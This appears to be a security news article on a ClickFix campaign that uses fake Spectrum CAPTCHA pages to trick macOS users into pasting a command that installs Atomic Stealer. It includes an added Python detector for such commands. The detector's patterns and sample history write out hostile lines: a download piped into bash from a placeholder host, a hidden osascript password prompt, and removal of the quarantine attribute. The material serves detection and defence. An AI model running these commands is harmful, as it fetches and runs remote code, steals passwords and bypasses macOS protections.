
Cybersecurity researchers have raised alarms over a dangerous new malware campaign that uses social engineering tactics to deploy an information-stealing malware known as Atomic macOS Stealer (AMOS) on Apple macOS systems. This campaign, identified by CloudSEK, utilizes typosquatted domains that imitate the U.S.-based telecom provider Spectrum.
Visitors to these domains are served a malicious shell script that harvests the system password and then downloads a variant of AMOS for the next stage of the attack. Security researcher Koushik Pal noted that the script relies on native macOS commands to get around built-in protections and execute the malicious binaries.
Investigations indicated that Russian-speaking cybercriminals are implicated in this operation, as noted by the inclusion of Russian comments found within the malware’s source code.
The attack begins with a deceptive web page that impersonates Spectrum, hosted on URLs such as "panel-spectrum.net" or "spectrum-ticket.net." Visitors are asked to complete an hCaptcha check under the pretense of reviewing their connection's security. When they click the "I am human" checkbox, however, they get an error message pointing them to an "Alternative Verification."
Clicking through silently copies a command to the user's clipboard, and the page then instructs them to paste and run it in Terminal on macOS or in PowerShell on Windows. Once run, the script prompts for the user's system password and downloads the next-stage payload, which drops Atomic Stealer.
Pal observed that the delivery sites were sloppily built, serving mismatched instructions that suggest the infrastructure was assembled in a hurry: visitors with Linux user agents were handed PowerShell commands, and Windows and Mac users received identical instructions.
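The flow described above (a command copied to the clipboard, a password prompt, a remote download and native macOS commands used to sidestep protections) leaves recognisable traces in Terminal history and in EDR process-command-line telemetry. The following is an added example, not code from the article, CloudSEK or the campaign itself: a small Python heuristic that scores command lines against indicators shaped like that flow. The specific indicators (curl piped into a shell, an osascript "hidden answer" dialog for the password, removal of the com.apple.quarantine attribute) and the sample history are constructed assumptions about what such a script looks like; the article does not publish the script's contents.

```python
"""Heuristic detector for ClickFix-style terminal commands on macOS.

Added example; not code from CloudSEK or the article. Scores a command line
(for example one pasted from the clipboard into Terminal) against indicators
drawn from the campaign description. The pattern set, weights, threshold and
sample history below are constructed assumptions, not published IOCs.
"""
import re
from dataclasses import dataclass, field

# (name, regex, weight). Constructed heuristics; tune against your own baseline.
INDICATORS = [
    ("download_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 3),
    ("base64_decode_exec",
     re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z)?sh\b"), 3),
    # Assumed form of a native macOS password prompt: AppleScript dialog
    # with the answer field hidden.
    ("password_prompt_osascript",
     re.compile(r"osascript\b.*display dialog.*hidden answer", re.S), 3),
    # Stripping the quarantine attribute lets a downloaded binary run
    # without the Gatekeeper prompt.
    ("quarantine_removal",
     re.compile(r"xattr\s+(-r\s+)?-d\s+com\.apple\.quarantine"), 2),
    ("sudo_with_piped_password",
     re.compile(r"echo\s+.*\|\s*sudo\s+-S\b"), 2),
    ("hidden_temp_path",
     re.compile(r"/(tmp|var/tmp|private/tmp)/\.[A-Za-z0-9_]+"), 1),
]


@dataclass
class Verdict:
    command: str
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Threshold is an assumption: a single strong indicator is enough.
        return self.score >= 3


def assess(command: str) -> Verdict:
    """Score one command line; hits lists the indicator names that matched."""
    v = Verdict(command=command)
    for name, rx, weight in INDICATORS:
        if rx.search(command):
            v.hits.append(name)
            v.score += weight
    return v


def scan_history(lines):
    """Return verdicts only for lines that cross the threshold, in order."""
    verdicts = (assess(line.strip()) for line in lines if line.strip())
    return [v for v in verdicts if v.suspicious]


# Constructed sample "terminal history": two benign lines and two shaped like
# the flow in the article (download and run, then password prompt and
# quarantine removal). The host names are placeholders.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/setup.sh -o setup.sh",
    "curl -fsSL https://example.invalid/i | bash",
    "osascript -e 'display dialog \"Enter password\" default answer \"\" "
    "with hidden answer' && xattr -d com.apple.quarantine /tmp/.u",
]

if __name__ == "__main__":
    for v in scan_history(SAMPLE_HISTORY):
        print(f"[score {v.score}] {v.hits} :: {v.command}")
```

Run it as a script to see the two constructed malicious lines flagged while the plain `curl -o` download is not. The same `assess` function can be pointed at `~/.zsh_history` or at process-creation events from an EDR; the point of weighting rather than single-pattern matching is that a lone `curl | sh` is common in developer workflows, whereas a password dialog combined with quarantine removal in one invocation rarely is.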
The disclosure of this attack arrives amidst an upward trend in ClickFix tactics for delivering various malware strains over the past year. Darktrace, a cybersecurity firm, reported that actors engaged in these targeted attacks tend to use similar techniques to gain initial access, which includes spear phishing and exploiting trust in familiar platforms to deliver harmful payloads.
ClickFix campaigns typically redirect users to malicious URLs disguised with fake CAPTCHA verification checks. This manipulation convinces users they are merely addressing a harmless security measure, inadvertently leading them to execute harmful commands.
CloudSEK documented multiple ClickFix incidents across various regions, including Europe, the Middle East, Africa, and North America, with these campaigns becoming increasingly prevalent and showcasing diverse methods to deliver malware.
Recently, an email phishing campaign reported by Cofense may have targeted hotel chains and the food industry, employing spoofed Booking.com messages that linked to fake CAPTCHA sites. This opportunistic use of ClickFix tactics underscores its adaptable nature for malware distribution across various sectors.
As users grow accustomed to frequent security prompts and CAPTCHA checks, they become more likely to comply without thinking, and threat actors exploit that by engineering a few simple steps that blend into everyday browsing and end with the user compromising their own system.